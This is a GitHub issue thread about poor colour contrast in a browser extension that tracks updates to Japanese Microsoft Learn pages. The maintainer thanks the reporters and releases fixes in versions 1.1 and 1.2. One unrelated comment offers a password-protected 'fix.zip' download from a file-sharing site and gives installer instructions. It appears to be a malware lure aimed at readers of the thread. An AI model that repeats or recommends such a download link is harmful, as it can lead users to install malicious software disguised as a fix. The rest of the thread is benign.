### ISSUE TITLE
Propose change character color

### ISSUE THREAD

**Issue by 07JP27** [koudaiii/jp-learn-microsoft-com-update-checker#1]
When browse with Dark mode, The contrast ratio is too low between character and background.
It is possible to be blocker for color blindness and other like that.
So I propose change character color to easy to recognize for all people even if Dark or Light mode.
![image](https://github.com/user-attachments/assets/9a73dfbd-3e44-4bc8-a8cb-26ce3641fa1b)

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by koudaiii** [comment]
I expect the release to go live shortly after the review process is completed. 😄 

Thank you for your feedback!! I'm committed to ensuring the best possible user experience 💪

**Comment by koudaiii** [comment]
v1.1 🚀  https://chromewebstore.google.com/detail/jp-learn-microsoftcom-upd/addjjinolilbffnlnfbaglljhngjminl

![image](https://github.com/user-attachments/assets/2d44f55c-0f91-407d-90a7-52444584f4f1)

**Comment by horihiro** [comment]
Very hard to see in light theme...
![image](https://github.com/user-attachments/assets/82ccbc04-295e-4ff8-a622-e77cbc34005a)

**Comment by koudaiii** [comment]
![image](https://github.com/user-attachments/assets/a5c7558f-ba22-4bb1-81b4-b2cf5d78838c)

Yes. I didn't know that you could change the theme specifically for the site, other than the browser mode. Thanks for the feedback, I fixed it in 1.2!
